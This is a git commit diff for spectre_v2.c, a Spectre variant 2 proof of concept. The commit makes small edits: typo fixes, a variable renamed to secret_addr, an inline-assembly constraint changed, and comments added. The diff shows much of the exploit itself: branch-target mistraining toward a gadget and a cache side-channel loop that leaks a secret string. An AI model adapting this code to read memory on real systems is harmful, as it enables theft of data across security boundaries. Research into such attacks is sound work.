Typos, change variable name for readability
This commit is contained in:
Samuel Aubertin
parent
5804d30227
commit
8dbe117cb0
22
spectre_v2.c
22
spectre_v2.c
@ -26,7 +26,7 @@ char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism,
|
|||||||
uint64_t* target; // pointer to indirect call target
|
uint64_t* target; // pointer to indirect call target
|
||||||
unsigned int cache_hit_threshold, array1_size = 16;
|
unsigned int cache_hit_threshold, array1_size = 16;
|
||||||
uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
||||||
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
//uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
||||||
uint8_t channel[256 * GAP]; // side channel to extract secret phrase
|
uint8_t channel[256 * GAP]; // side channel to extract secret phrase
|
||||||
|
|
||||||
// mistrained target of indirect call
|
// mistrained target of indirect call
|
||||||
@ -44,15 +44,15 @@ safe_target(char* addr)
|
|||||||
}
|
}
|
||||||
|
|
||||||
// function that makes indirect call
|
// function that makes indirect call
|
||||||
// note that addr will be passed to gadget via %rdi
|
// note that addr will be passed to gadget via %rdi
|
||||||
int
|
int
|
||||||
victim_function(char* addr, int input)
|
victim_function(char* addr, int input)
|
||||||
{
|
{
|
||||||
#pragma GCC diagnostic ignored "-Wuninitialized"
|
#pragma GCC diagnostic ignored "-Wuninitialized"
|
||||||
unsigned int result, junk = junk;
|
unsigned int result, junk = junk;
|
||||||
// set up branch history buffer (bhb) by performing >29 taken branches
|
// set up branch history buffer (bhb) by performing >29 taken branches
|
||||||
// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
|
// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
|
||||||
// for details about how the branch prediction mechanism works
|
// for details about how the branch prediction mechanism works
|
||||||
// junk and input used to guarantee the loop is actually run
|
// junk and input used to guarantee the loop is actually run
|
||||||
for (int i = 1; i <= 100; i++) {
|
for (int i = 1; i <= 100; i++) {
|
||||||
input += i;
|
input += i;
|
||||||
@ -61,10 +61,10 @@ victim_function(char* addr, int input)
|
|||||||
// call *target
|
// call *target
|
||||||
__asm volatile(
|
__asm volatile(
|
||||||
"mov %%rax, %2\n"
|
"mov %%rax, %2\n"
|
||||||
"callq *%1\n"
|
"callq *%1\n"
|
||||||
"mov %0, %%eax\n"
|
"mov %0, %%eax\n"
|
||||||
: "=r" (result)
|
: "=r" (result)
|
||||||
: "r" (*target), "r" (addr)
|
: "r" (*target), "rm" (addr)
|
||||||
: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
|
: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
|
||||||
return result & junk;
|
return result & junk;
|
||||||
}
|
}
|
||||||
@ -87,6 +87,7 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
|
|||||||
channel[i * GAP] = 1;
|
channel[i * GAP] = 1;
|
||||||
}
|
}
|
||||||
for (tries = 999; tries > 0; tries--) {
|
for (tries = 999; tries > 0; tries--) {
|
||||||
|
// Malicious target
|
||||||
*target = (uint64_t)&gadget;
|
*target = (uint64_t)&gadget;
|
||||||
#ifndef NOMFENCE
|
#ifndef NOMFENCE
|
||||||
_mm_mfence();
|
_mm_mfence();
|
||||||
@ -94,7 +95,6 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
|
|||||||
for (j = 50; j > 0; j--) {
|
for (j = 50; j > 0; j--) {
|
||||||
junk ^= victim_function(&dummy, 0);
|
junk ^= victim_function(&dummy, 0);
|
||||||
}
|
}
|
||||||
|
|
||||||
#ifndef NOMFENCE
|
#ifndef NOMFENCE
|
||||||
_mm_mfence();
|
_mm_mfence();
|
||||||
#endif
|
#endif
|
||||||
@ -129,7 +129,9 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
|
|||||||
#ifndef NOMFENCE
|
#ifndef NOMFENCE
|
||||||
_mm_mfence();
|
_mm_mfence();
|
||||||
#endif
|
#endif
|
||||||
// call victim
|
// call victim
|
||||||
|
|
||||||
|
//printf("victim with %p\n", target_addr);
|
||||||
junk ^= victim_function(target_addr, 0);
|
junk ^= victim_function(target_addr, 0);
|
||||||
#ifndef NOMFENCE
|
#ifndef NOMFENCE
|
||||||
_mm_mfence();
|
_mm_mfence();
|
||||||
@ -165,7 +167,7 @@ main(int argc, char** argv)
|
|||||||
{
|
{
|
||||||
int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
|
int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
|
||||||
uint8_t value[2];
|
uint8_t value[2];
|
||||||
char* addr = secret;
|
char* secret_addr = secret;
|
||||||
|
|
||||||
while ((o = getopt(argc, argv, "t:j")) != EOF) {
|
while ((o = getopt(argc, argv, "t:j")) != EOF) {
|
||||||
switch (o) {
|
switch (o) {
|
||||||
@ -197,7 +199,7 @@ main(int argc, char** argv)
|
|||||||
}
|
}
|
||||||
#endif
|
#endif
|
||||||
while (--len >= 0) {
|
while (--len >= 0) {
|
||||||
leak(addr++, value, score, cache_hit_threshold);
|
leak(secret_addr++, value, score, cache_hit_threshold);
|
||||||
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
||||||
successes++;
|
successes++;
|
||||||
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user